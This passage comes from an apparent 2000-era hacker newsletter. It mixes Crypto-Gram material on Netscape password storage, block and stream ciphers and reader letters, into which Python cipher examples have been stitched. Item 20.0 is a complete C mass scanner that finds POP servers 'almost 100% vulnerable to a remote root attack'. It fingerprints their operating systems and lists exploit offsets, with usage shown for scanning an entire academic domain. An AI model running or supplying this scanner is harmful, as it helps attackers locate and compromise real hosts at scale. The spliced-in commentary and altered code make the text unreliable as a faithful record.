option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that 'computer experts could still access the information, in case someone forgot their password.'" In other words, they implemented lousy security on purpose. "Netscape's Saito said the company wasn't aware of the vulnerability and added that a 'security fix' would be forthcoming if that vulnerability were proved to exist. 
If the Javascript vulnerability doesn't exist, a password stealer would have to have physical access to a user's computer to figure out the algorithm." Note the complete ignorance of viruses like Melissa, or Trojan horses like Back Orifice. "Saito noted that Netscape already has numerous safety features, including a Secure Sockets Layer, which enables users to communicate securely with Web servers, and a protocol for encrypting e-mail messages sent." None of which matters if the password is stolen.

http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html

RST's information:
http://www.rstcorp.com/news/bad-crypto.html
http://www.rstcorp.com/news/bad-crypto-tech.html

** *** ***** ******* *********** *************

Block and Stream Ciphers

Block and stream ciphers both transform a message from plaintext to ciphertext one piece at a time. Block ciphers apply the same transformation to every piece of the message, and typically deal with fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream ciphers apply a different transformation to each piece of the message, and typically deal with fairly small pieces of the message (1 bit, 1 byte) at a time. Traditionally they have been separate areas of research, but these days they are converging. And if you poke around at the issues a bit, you'll see that they are not very different at all.

Stream ciphers first. Traditional stream ciphers consist of three standard pieces: an internal state, a next-state function, and a plaintext-to-ciphertext transformation function. The internal state is generally small, maybe a hundred bits, and can be thought of as the key. The next-state function updates the state. The transformation function takes a piece of plaintext, mixes it with the current state, and produces the same size ciphertext. And then the stream cipher goes on to the next piece. The security of this scheme is based on how cryptographically annoying the two functions are.
Sometimes just one of the functions is cryptographically annoying. In electronic stream ciphers, a complicated next-state function is usually combined with a simple transformation that takes the low-order bit of the state and XORs it with the plaintext. In rotor machines, such as the German Enigma, the next-state function was a simple stepping of various rotors, and the transformation function was very complicated. Sometimes both are cryptographically complicated.

These ciphers could generally operate in two modes, depending on the input into the next-state function. If the only input was the current state, these were called output-feedback (OFB) ciphers. If there was the additional input of the previous ciphertext bit, these were called cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew these modes as "key auto-key" (KAK) and "ciphertext auto-key" (CTAK), respectively.) And you chose one mode over the other because of error propagation and resynchronization properties. (Applied Cryptography explains all this in detail.)

Traditionally, stream cipher algorithms were as simple as possible. These were implemented in hardware, and needed as few gates as possible. They had to be fast. The result was many designs based on simple mathematical functions: e.g., linear feedback shift registers (LFSRs). They were analyzed based on metrics such as linear complexity and correlation immunity. Analysts looked at cycle lengths and various linear and affine approximations. Most U.S. military encryption algorithms, at least the ones in general use in the 1980s and before, are stream ciphers of these sorts.

Block ciphers are different. They consist of a single function: one that takes a plaintext block (a 64-bit block size is traditional) and a key and produces a ciphertext block. The NSA calls these ciphers codebooks, and that is an excellent way to think of them. For each key, you can imagine building a table.
On the left column is every possible plaintext block; on the right column is every possible ciphertext block. That's the codebook. It would be a large book, 18 billion billion entries for the smallest commonly used block ciphers, so it is easier to just implement the algorithm mathematically -- especially since you need a new book for each key. But in theory, you could implement it as a single table lookup in a very large codebook. Block ciphers can be used simply as codebooks, encrypting each 64-bit block independently (and, in fact, that is called electronic codebook (ECB) mode), but that has a bunch of security problems. An attacker can rearrange blocks, build up a portion of the codebook if he has some known plaintext, etc. So generally block ciphers are implemented in one of several chaining modes. Before listing the block cipher chaining modes, it's worth noticing that a block cipher algorithm can serve as any of the functions needed to build a stream cipher: the next-state function or the output function. And, in fact, that is what block cipher modes are: stream ciphers built using the block cipher as a primitive. A block cipher in output-feedback mode is simply the block cipher used as the next-state function, with the output of the block cipher being the simple output function. A block cipher in cipher-feedback mode is the same thing, with the addition of the ciphertext being fed into the next-state function. A block cipher in counter mode uses the block cipher as the output function, and a simple counter as the next-state function. Cipher block chaining (CBC) is another block-cipher mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the block cipher is part of the plaintext-to-ciphertext transformation function, and the next-state function is simple. For some reason I can't explain, for many years academic research on block ciphers was more practical than research on stream ciphers. 
There were more concrete algorithm proposals, more concrete analysis, and more implementations. While stream cipher research stayed more theoretical, block ciphers were used in security products. (I assume this was the reverse in the military, where stream ciphers were used in products and were the target of operational cryptanalysis resources.) DES's official sanction as a standard helped this, but before DES there was Lucifer. And after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many more.

Recently, stream ciphers underwent something of a renaissance. These new stream ciphers were designed for computers and not for discrete hardware. Instead of producing output a bit at a time, they produced output a byte at a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were no longer constrained by a small internal state -- RC4 takes a key and turns it into a 256-byte internal state, SEAL's internal state is even larger -- or tight hardware-based complexity restrictions. Stream ciphers, which used to be lean and mathematical, started looking as ugly and kludgy as block ciphers. And they started appearing in products as well.

So, block and stream ciphers are basically the same thing; the difference is primarily a historical accident. You can use a block cipher as a stream cipher, and you can take any stream cipher and turn it into a block cipher. The mode you use depends a lot on the communications medium -- OFB or CBC makes the most sense for computer communications with separate error detection, while CFB worked really well for radio transmissions -- and the algorithm you choose depends mostly on performance, standardization, and popularity. There's even some blurring in modern ciphers. SEAL, a stream cipher, looks a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block cipher, looks very much like a stream cipher. Some new algorithms can be used both as block ciphers and stream ciphers.
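As an added example (not from the essay, from Counterpane, or from any library), here is the essay's framing of block-cipher modes as stream ciphers written out in Python: OFB, CFB, CTR and CBC are each a state, a next-state function and an output function wrapped around a block cipher, and damaged_bytes() flips one ciphertext bit to show the error-propagation and resynchronization behaviour that, as the essay says, decides between OFB/CBC for computer links with separate error detection and CFB for radio. The 64-bit Feistel block cipher is a toy stand-in for DES or Blowfish that I made up for this example and is not secure; the key, IV and plaintext are constructed sample values.

```python
"""Added example: the four chaining modes as stream ciphers (state, next-state
function, output function) over a toy 64-bit Feistel cipher, plus a check of
how one flipped ciphertext bit propagates under each mode.  The Feistel
cipher is an assumed stand-in for DES/Blowfish and is NOT secure."""
import struct

BLOCK = 8                 # 64-bit block, like DES or Blowfish
MASK32 = 0xFFFFFFFF


def _round_f(half, subkey):
    # Toy nonlinear round function on one 32-bit half (assumed, not a real cipher).
    x = (half ^ subkey) & MASK32
    x = (x * 0x9E3779B1 + 0x7F4A7C15) & MASK32
    x ^= x >> 15
    return ((x << 7) | (x >> 25)) & MASK32


def _subkeys(key):
    k = int.from_bytes(key.ljust(8, b"\0")[:8], "big")
    return [((k >> (8 * r)) ^ (0x01010101 * (r + 1))) & MASK32 for r in range(8)]


def toy_encrypt_block(key, block):
    l, r = struct.unpack(">II", block)
    for sk in _subkeys(key):
        l, r = r, l ^ _round_f(r, sk)
    return struct.pack(">II", r, l)        # undo the final swap


def toy_decrypt_block(key, block):
    l, r = struct.unpack(">II", block)
    for sk in reversed(_subkeys(key)):
        l, r = r, l ^ _round_f(r, sk)
    return struct.pack(">II", r, l)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _blocks(data):
    if len(data) % BLOCK:
        raise ValueError("example expects whole blocks; pad first")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


# Each mode starts its state at the IV and, per block, computes an output and
# a next state.  `decrypt` only matters where ciphertext feeds the state.

def ofb(key, iv, data, decrypt=False):
    # next-state = E_k(state); output = P xor state.  Self-inverse.
    state, out = iv, bytearray()
    for chunk in _blocks(data):
        state = toy_encrypt_block(key, state)
        out += _xor(chunk, state)
    return bytes(out)


def ctr(key, iv, data, decrypt=False):
    # next-state = counter + 1; output = P xor E_k(iv xor counter).  Self-inverse.
    out = bytearray()
    for n, chunk in enumerate(_blocks(data)):
        out += _xor(chunk, toy_encrypt_block(key, _xor(iv, n.to_bytes(BLOCK, "big"))))
    return bytes(out)


def cfb(key, iv, data, decrypt=False):
    # next-state = previous ciphertext block; output = P xor E_k(state).
    state, out = iv, bytearray()
    for chunk in _blocks(data):
        res = _xor(chunk, toy_encrypt_block(key, state))
        state = chunk if decrypt else res   # the ciphertext block, either way
        out += res
    return bytes(out)


def cbc(key, iv, data, decrypt=False):
    # The block cipher sits in the output function; next-state = previous ciphertext.
    state, out = iv, bytearray()
    for chunk in _blocks(data):
        if decrypt:
            res, state = _xor(toy_decrypt_block(key, chunk), state), chunk
        else:
            res = state = toy_encrypt_block(key, _xor(chunk, state))
        out += res
    return bytes(out)


MODES = {"OFB": ofb, "CTR": ctr, "CFB": cfb, "CBC": cbc}


def damaged_bytes(mode, key, iv, plaintext, flip_index):
    """Flip one bit of the ciphertext at flip_index, decrypt, and return the
    indices of the plaintext bytes that came back wrong."""
    ct = bytearray(mode(key, iv, plaintext))
    ct[flip_index] ^= 0x01
    pt2 = mode(key, iv, bytes(ct), True)
    return [i for i, (a, b) in enumerate(zip(plaintext, pt2)) if a != b]


if __name__ == "__main__":
    key, iv = b"toy-key!", b"\x00" * 7 + b"\x01"       # constructed sample values
    pt = bytes(range(32))
    for name, mode in MODES.items():
        assert mode(key, iv, mode(key, iv, pt), True) == pt
        print(name, "bytes wrong after a 1-bit error in ciphertext byte 10:",
              damaged_bytes(mode, key, iv, pt, 10))
```

Running it shows one wrong byte for OFB and CTR (no propagation, but also no way to recover if a byte is lost rather than flipped), one byte plus the following block for CFB (the next block decrypts from the undamaged ciphertext, so the cipher resynchronizes by itself), and a whole garbled block plus one byte in the next block for CBC.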
But stream ciphers should be faster than block ciphers. Currently the fastest block ciphers encrypt data at 18 clock cycles per byte (that's Twofish, the fastest AES submission). The fastest stream ciphers are even faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a general 32-bit architecture for comparison; your actual performance may vary somewhat.)

I don't believe this is an accident. Stream ciphers can have a large internal state that changes for every output, but block ciphers have to remain the same. RC4 has a large table -- you can think of it as an S-box -- that changes every time there is an output. Most block ciphers also have some kind of S-box, but it remains constant for each encryption with the same key. There's no reason why you can't take a block cipher, Blowfish for example, and tweak it so that the S-boxes modify themselves with every output. If you're using the algorithm in OFB mode, it will still encrypt and decrypt properly. But it will be a lot harder to break for two reasons. One, the internal state is a moving target and it is a lot harder for an attacker to build a model of what is going on inside the state. Two, if the plaintext-to-ciphertext transformation is built properly, attacks based on chosen plaintext or chosen ciphertext are impossible. And if it is a lot harder to break a cipher with self-modifying internals, then you can probably get by with fewer rounds, or less complexity, or something. I believe that there is about a factor of ten speed difference between a good block cipher and a good stream cipher.

Designing algorithms is very hard, and I don't suggest that people run out and modify every block cipher they see. We're likely to continue to use block ciphers in stream-cipher modes because that's what we're used to, and that's what the AES process is going to give us as a new standard.
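As an added illustration of the self-modifying-table design the essay describes (my code, written from the public 1994 description of RC4; not the page's code and not a library), here is RC4 with the state update isolated in one function, plus a helper that counts how many table entries have moved after n output bytes. RC4 is broken today (biased keystream, related-key weaknesses) and appears here only to make the design point; it must not be deployed. The "Key"/"Plaintext" test vector in the usage line is the published one.

```python
"""Added example: RC4, the essay's instance of a stream cipher whose entire
state is a 256-entry table that is swapped on every output byte.  Written
from the public description; not the page's or any library's code.  RC4 is
cryptographically broken and is shown only to illustrate the design."""


def rc4_schedule(key):
    """Key-scheduling: turn a 1..256-byte key into a permutation S of 0..255."""
    if not 1 <= len(key) <= 256:
        raise ValueError("key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_step(S, i, j):
    """One next-state + output step.  The swap is what makes S a moving
    target: the table the next byte is read from is already different."""
    i = (i + 1) & 0xFF
    j = (j + S[i]) & 0xFF
    S[i], S[j] = S[j], S[i]
    return i, j, S[(S[i] + S[j]) & 0xFF]


def rc4_keystream(key):
    """Generator of keystream bytes.  It depends on the key only, never on
    the text, so this is an OFB-style design and encrypt == decrypt."""
    S, i, j = rc4_schedule(key), 0, 0
    while True:
        i, j, out = rc4_step(S, i, j)
        yield out


def rc4_crypt(key, data):
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def state_positions_changed(key, n):
    """How many of the 256 table entries have moved after n output bytes.
    A block cipher with fixed S-boxes would return 0 for every n."""
    start = rc4_schedule(key)
    S, i, j = list(start), 0, 0
    for _ in range(n):
        i, j, _out = rc4_step(S, i, j)
    return sum(1 for a, b in zip(start, S) if a != b)


if __name__ == "__main__":
    # Published RC4 test vector: key "Key", text "Plaintext" -> bbf316e8d940af0ad3
    print(rc4_crypt(b"Key", b"Plaintext").hex())
    print(state_positions_changed(b"Key", 16), "table entries moved after 16 bytes")
```

Each step moves at most two entries, so after n bytes at most 2n of the 256 positions differ from the keyed table; the point is that an attacker modelling the "S-box" never gets the same one twice, which is exactly what a Blowfish-style cipher with fixed key-dependent S-boxes does not offer.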
But further research into stream ciphers, and ways of taking advantage of the inherent properties of stream ciphers, is likely to produce families of algorithms with even better performance. ** *** ***** ******* *********** ************* Comments from Readers From: Markus Kuhn Subject: German smart-card hack The note on "German hackers have succeeded in cracking the Siemens digital signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong. I have been in contact with the German Hacker (Christian Kahlo) behind this story. He discovered that one user of the Siemens SLE44 chip series included in his ROM software a routine that allowed him to upload and execute not only interpreter bytecode, but also raw 8052 assembler instructions. Using this undocumented facility, Christian uploaded a tiny assembler program that dumped the entire ROM of the card. The ROM was investigated, posted on the USENET as a documented disassembler listing in a TeX file and no vulnerabilities were found. Christian also discovered in the ROM that the SLE chips send out the chip type and serial number when the I/O line is held low during a positive reset edge and the following 600-700 clock cycles, which is a perfectly normal feature (comparable to the BIOS power-up message of a PC) that is fully documented in the SLE44 data sheets and that is not security relevant. No smartcard applications were hacked this way, no vulnerability was found in any smartcard application, and definitely no private keys were compromised. All this also has nothing to do with digital signatures. Any news to the contrary is the result of misunderstandings by journalists, who as usual fill in the gaps of the story with their limited technical background knowledge and try to formulate such reports to be more spectacular than the story behind them. 
The only policy that has been violated here is that Siemens -- like most other smartcard chip producers -- tries to make sure that nobody except big customers can easily get access to smartcard development kits that allow uploading assembler code directly, which might otherwise shorten the learning curve for a microprobing attacker slightly. Users of Siemens chips that allow code uploads are apparently required to use a bytecode interpreter instead. This policy seems to have been ignored secretly by one Siemens customer who left a backdoor in his byte-code interpreter to enable the later upload of high-speed crypto routines that cannot be implemented sufficiently efficiently in the bytecode. Christian discovered this, even though he decided *not* to publish the details on how he did this or the name of the Siemens customer in whose cards he had discovered this. All he published was a dump of the standard Siemens SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a piece of code that had already been known semi-publicly for many years in the pay-TV hacking community from successful microprobing attacks on the SLE44 series. Christian's main contribution is that he has discovered a very nice low-cost assembler-level development kit for some of the SLE smartcards, which used to cost a fortune and an NDA before. This is not the first time that this has happened: Pay-TV smartcards have been shipped before with software that provides for uploads of EEPROM software patches with broken authentication techniques, which has been known and used in the smartcard tampering community for many years.

From: anonymous
Subject: Re: New U.S. Crypto Export Regulations

In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S. crypto export regulations, and I can agree with everything you said. However, I believe you missed something important: the view FROM the rest of the world.
I work in the finance industry in Europe -- Zurich, to be precise -- and have some involvement with security. This industry (a) WILL NOT use U.S. crypto products, and (b) will certainly NOT make any long-term plans or partnerships to do so for U.S. products with consumer content, because (a) the products to date are forced by law to be weak, but more important, (b) the U.S. government can't be trusted. Even if it approved today the export of some products based on strong crypto, everyone knows that this permission could be terminated tomorrow for the same or other products. And everyone also suspects strongly that the U.S. government will in any case force providers to put trap doors into their products. Under the circumstances, the European finance and e-business industries would have to be crazy to use U.S. crypto-based products. And they're not crazy. To play in this business in the rest of the world, the U.S. will have to have a clear, consistent, and favorable policy, and U.S. companies will have to present products that are demonstrably strong with no trap doors. (I invite you to speculate if this will happen before Hell freezes over.) In the meantime, there are plenty of non-U.S. products to choose from, and banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche Bank, Generale Bank, Bank Austria, and Barclays are not sitting back anxiously waiting for U.S. products to become available. They're doing business with non-U.S. products that are just fine, thank you.

From: "Grawrock, David"
Subject: Electronic voting

All these comments regarding electronic voting and absentee voting are missing the mark. In the State of Oregon, all elections (except presidential) are done by mail. It's like the entire state is voting absentee. The process is actually pretty painless. You receive your voter pamphlet and then you get your ballot. It has to be in by election day.
If you miss the excitement of going to the voting booth there are collection points where you can drop off your filled-in ballot. It's really not that hard. The point here is that the state has determined that it is easier (and cheaper) to simply process the entire election via the absentee process. It now becomes a simple step to go from by mail to by electronic voting. All of the arguments regarding coercion must already have been answered (the government always thinks a process through completely). We have elected all sorts of politicians without anyone coming back and reporting problems with coercion.

From: Gerry Brown
Subject: RE: Absentee Ballots

I just checked some figures with a friend who has the data on Absentee Ballots for San Mateo County in California and he has compared it with the San Francisco elections held this week. The percentage of registered voters using absentee ballots is about 13%-15%. But more astonishing is the fact that 35%-50% of those actually voting are done by absentee ballots. The lower figure is for national elections and the higher side corresponds to local elections.

From: "Hillis, Brad"
Subject: PKI article--agree and disagree

I can't begin to tell you how much I enjoyed your article with Carl Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key." I'm the lead ecommerce attorney for the state of Washington, and we are currently procuring a private PKI vendor to provide digital signatures for state and local government, similar to the federal government ACES procurement. What you say that PKI is not needed for ecommerce to flourish is true. It's a thought I keep having at all the digital signature law presentations I attend, and the theme I had planned to discuss at my March 7 talk in Boston on PKI. One has to keep asking oneself, why do I need a digital signature? What is the opportunity cost of setting up a PKI?
(That is, what security improvements could I make if I spent the money on something besides PKI). However, I disagree with this statement in your article: "In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible." The law seems to say that at first reading, but my view of the law is that it sets up a "rebuttable presumption" of non-repudiation. This is the same rule that applies to physical, pen and ink signatures. Your statement reflects the views of some proponents of PKI who overstate the legal force of a "licensed digital signature" under Washington law. But if, in fact, I never applied my digital signature to a document, and I can prove it (e.g., I have an alibi), then I would not be legally responsible. I believe that is the situation in non-PKI electronic signature schemes, where a (paper and manually signed) Electronic Data Interchange Agreement or Trading Partner Agreement will state that all data submitted between the parties carries the same legal force as if it was manually signed. Having found flaws in the PKI-style laws of Washington, Utah and Minnesota, I do not find a great deal of higher or practical intelligence in the more popular electronic signature laws, either. Esignature laws have not proven any more important to ecommerce than PKI digital signature laws, so why are we in such a rush to pass UETA (uniform electronic transaction act)? From: "Carl Ellison" Subject: Re: PKI article--agree and disagree You are correct. However, I believe we still need to warn against the rebuttable presumption of non-repudiation. The keyholder may have no alibi at all. The keyholder may not be aware that his key was misused (e.g., by an attacker who had gained physical or network access to his computer). 
This is similar to the position people were in in Britain when they were challenging ATM card operations. It took expert witnessing by Ross Anderson to defend some of their claims, and even then it didn't always work. There, too, the presumption was that the cardholder performed any operation when the ATM logs said he did -- whether he did or not. It was up to the cardholder to prove the negative. This gets even worse when the keyholder has his private key on a smartcard in his possession. It's that much harder to convince a jury that you didn't sign, if the merchant or bank can claim that the signing key never left your personal possession. When an attacker has network access to your computer, he doesn't leave a trail. You have no audit record showing the attack. It's your word against the merchant's and you have no evidence to offer on your behalf. You can't even accuse anyone else. You have no idea who to accuse. Meanwhile, your account has been debited until you manage to prove your point (against the presumption that you're lying). When you compare this to credit card purchases, it's radically different. With a credit card, you have not spent anything until you write the check to the credit card company. When or before you write that check, you can challenge a line item and force the merchant to prove that you were in fact the purchaser. At least with my AMEX account, the immediate result is that AMEX removes the item from my statement -- to be reinstated if the merchant is able to prove that I did do the purchase. I have had such challenges go my way once and the other times, I had simply forgotten. In one case, I thought I was being double-billed, but it turns out I had never been billed the first time (many months before). From: Alfred John Menezes Subject: Elliptic Curve Cryptosystems I read with interest your recent article on ECC in the November 15 issue of Crypto-Gram. I agree with most of your statements and comments. 
Your recommendations were:

1) If you're working in a constrained environment where longer keys just won't fit, consider elliptic curves.
2) If the choice is elliptic curves or no public-key algorithms at all, use elliptic curves.
3) If you don't have performance constraints, use RSA.
4) If you are concerned about security over the decades (and almost no systems are), use RSA.

I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be worse than no security at all! Regarding recommendation 3), I think that most environments which call for public-key solutions will have *some* performance constraints. The limiting factor could be an over-burdened web server which needs to sign thousands of outgoing messages per minute, a handheld device which is communicating with a PC, etc. In such scenarios, one should select the public-key method that performs the best in the most constrained environment. If the constraints involve key sizes, bandwidth, power consumption, or speed (for private key operations), then ECC is likely the method of choice over RSA. Finally, I feel that your recommendation that RSA should be used (instead of ECC) in situations where you are concerned with long-term security is a bit unfair. After all, as you state in the postscript to your article, all the analysis you used on the elliptic curve discrete logarithm problem also applies to the integer factorization problem. I propose that applications which do require long-term security should consider using *both* RSA and ECC -- by double encrypting a message with RSA and ECC, or by signing a message twice with RSA and ECC.

The following are my condensed thoughts on the security and efficiencies of ECC as compared with RSA. They should be considered a supplement to your Crypto-Gram article, and not a replacement of it.
http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html

((This is a good essay, but remember the author's bias.
He works for Certicom, and it is in his financial interest for you to believe in elliptic curves. --Bruce))

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography.

Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/

Copyright (c) 2000 by Bruce Schneier

ISN is sponsored by Security-Focus.COM

@HWA

20.0 POPS.C qpop vulnerability scanner by Duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(The listing below is the scanner as published, with the #include lines that were lost in transcription restored, the strrchr() result stored in a char pointer instead of an int, the banner buffer NUL-terminated before strstr() is run over it, and the newline stripped from each input line once in main() rather than in every child. Behaviour is unchanged: it banner-grabs port 110 and, for QPOP/UCB hits, port 23.)

/* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net
 * takes list of ip's from stdin
 *
 * The hosts gathered by this scanner are almost 100% vulnerable to a
 * remote root attack. The exploits used to root the vulnerable machines
 * can all be found by searching bugtraq. UCB pop is 100% of the time
 * vulnerable to the qpop exploit (it's a very old version of qpop). The
 * QPOP version is filtered to make sure that non-vulnerable versions do
 * not show up in the scan.
 *
 * Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0
 *
 * Example usage:
 *   ./z0ne -o ac.uk | ./pops > ac.uk.log &
 * would scan ac.uk for vulnerabilities.
 *
 * much help from jsbach
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int ADMtelnet(u_long ip, int port);
void checkos(char *ip, int spl);
void scan(char *ip);

int NUMCHILDREN = 150, currchilds = 0;   /* change numchildren to taste */
char ip[64];                             /* one dotted quad per line of stdin */

void alrm(int sig) { (void)sig; }        /* SIGALRM only needs to interrupt connect() */

int main(void)
{
    while (fgets(ip, sizeof(ip), stdin) != NULL) {
        ip[strcspn(ip, "\r\n")] = '\0';  /* drop the newline once, up front */
        switch (fork()) {
        case 0:
            scan(ip);
            exit(0);
        case -1:
            printf("cannot fork so many timez@!@^&\n");
            exit(0);
        default:
            currchilds++;
            if (currchilds > NUMCHILDREN) {
                wait(NULL);              /* throttle: reap one before forking more */
                currchilds--;
            }
            break;
        }
    }
    while (wait(NULL) > 0)
        ;                                /* reap the remaining children */
    return 0;
}

/* Grab the POP3 banner on port 110 and dispatch on the server type. */
void scan(char *ip)
{
    struct sockaddr_in addr;
    struct sigaction sa;
    int sockfd;
    char buf[512];

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = alrm;                /* no SA_RESTART: connect() fails with EINTR */
    sigaction(SIGALRM, &sa, NULL);

    memset(&addr, 0, sizeof(addr));
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr(ip);
    addr.sin_port = htons(110);
    addr.sin_family = AF_INET;

    alarm(5);                            /* give up on dead hosts after 5 seconds */
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1) {
        memset(buf, 0, sizeof(buf));
        recv(sockfd, buf, sizeof(buf) - 1, 0);   /* leave room for the NUL */
        if (strstr(buf, "QPOP") != NULL && strstr(buf, "2.5") == NULL
            && strstr(buf, "krb") == NULL)
            checkos(ip, 1);
        if (strstr(buf, "UCB") != NULL)
            checkos(ip, 2);
        if (strstr(buf, "SCO") != NULL)
            printf("%s: SCO Unix box running SCO pop.\n", ip);
    }
    close(sockfd);
}

/* Fingerprint the OS from the telnet banner; spl 1 = QPOP, 2 = UCB pop. */
void checkos(char *ip, int spl)
{
    static const char *os[] = { NULL, "OpenBSD", "FreeBSD", "BSDi" };
    int which = ADMtelnet(inet_addr(ip), 23);

    if (which >= 1 && which <= 3)
        printf("%s: %s box running vuln %s\n", ip, os[which],
               spl == 1 ? "QPOP" : "UCB pop");
}

/* Connect to the telnet port, answer option negotiation with WONT, and
 * match the login banner.  Returns 1 OpenBSD, 2 FreeBSD, 3 BSDI, 0 unknown,
 * -1 if the connect failed. */
int ADMtelnet(u_long ip, int port)
{
    struct sockaddr_in sin;
    u_char buf[4000];
    int dasock, len, result = 0;
    int longueur = sizeof(struct sockaddr_in);

    dasock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);  /* gimme a socket */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;
    if (connect(dasock, (struct sockaddr *)&sin, longueur) == -1) {
        close(dasock);
        return -1;
    }
    while (1) {
        memset(buf, 0, sizeof(buf));
        if ((len = read(dasock, buf, 1)) <= 0)
            break;
        if (buf[0] == 255) {                 /* IAC: a 3-byte option command follows */
            read(dasock, buf + 1, 2);
            if (buf[1] == 253 && buf[2] == 0)
                ;                            /* DO BINARY: ignore */
            else if (buf[1] == 253) {        /* any other DO: reply WONT */
                buf[1] = 252;
                write(dasock, buf, 3);
            }
        } else if (buf[0] != 0) {            /* first byte of the banner text */
            memset(buf, 0, sizeof(buf));
            read(dasock, buf, sizeof(buf) - 1);
            usleep(40000);
            if (strstr((char *)buf, "OpenBSD") != NULL) { result = 1; break; }
            if (strstr((char *)buf, "FreeBSD") != NULL) { result = 2; break; }
            if (strstr((char *)buf, "BSDI") != NULL)    { result = 3; break; }
            sleep(1);
        }
    }
    close(dasock);
    return result;
}

@HWA

21.0 Hackunlimited special birthday free-cdrom offer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by noose

http://www.hackunlimited.com/

Would you want to have all the files in Hackunlimited.com on CD, for free of course? Just send mail to noose@hackunlimited.com. The message itself can be empty, just set the Subject to "Free CD" and you are part of our "lottery" :). You have until the 13th of February to send the message. 3 people will win the CD. The winners will be announced on the 22nd of February.

The CD will include all files at http://www.hackunlimited.com + all the files in http://www.hackunlimited.com/raz0r

The file list is available here: http://www.hackunlimited.com/cdlist.txt

@HWA

22.0 HACK MY SYSTEM! I DARE YA!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html

Title
"Can you break into my system? I dare you!"

Summary
We in Beyond Security believe that the only way to test your security is by trying to break it. But we're not as drastic as one Linux system administrator who took this one step further - he is asking attackers to try and break into a server he is administrating.

Details
Many administrators have to deal with potentially malicious users having legal accounts on their servers. Universities, ISPs and large companies have to consider the risk that local users, having access to the system as valid users, will sometime try to elevate their privileges.

The system administrator of zeus-olympus.yi.org assumes that some of his users are 'evil'. Although he is confident that his Linux system is secured, he would like others to do their best to attack his system. He therefore provided two user accounts that have normal user access to the system, and he allows anyone who wishes to use those accounts and gain entry to the server. Once logged in, the users are free to try and compromise the system's security, with no strings attached. The only 'catch' is that once a vulnerability is found, it should be reported immediately, so that the hole can be closed.

This offer is extremely unique. There have been 'hacking' contests in the past (usually by commercial companies trying to show that their product is secure), but this is one of the first times that an administrator is offering full access to the machine (using a valid user account) - which of course makes this game much more interesting. Therefore, if you would like to try and break a Linux Redhat machine, join this war game and give it your best shot.

Additional information
To join the contest, visit http://zeus-olympus.yi.org/ and enter the 'password required' section. The login is: war and the password is game.
Upon entering this section, you will receive the account information needed to log into the server.

Feel free to give Danny some feedback about his war game: dannyw@mediaone.net.

@HWA

23.0 PWA lead member busted by the FBI
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by TRDonJuan

http://www.suntimes.com/output/news/ware04.html

Software pirating ring cracked by local FBI

February 4, 2000

BY LORRAINE FORTE STAFF REPORTER

Chicago FBI agents say they have broken up a worldwide ring of software thieves--called the "Pirates with Attitude"--who were distributing thousands of programs, including the yet-unreleased Windows 2000.

A tip from an informant in Chicago led to the breakup of "one of the most sophisticated and longest-standing" piracy and hacking rings, according to a complaint filed Thursday in federal court in Chicago. The FBI used the informant's access codes to break into the group's Web site and obtain a roster of the suspects.

Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near Boston. Federal officials say he was a founder and key member of the ring, which evaded law enforcement for eight years. He is charged with conspiring to infringe copyright.

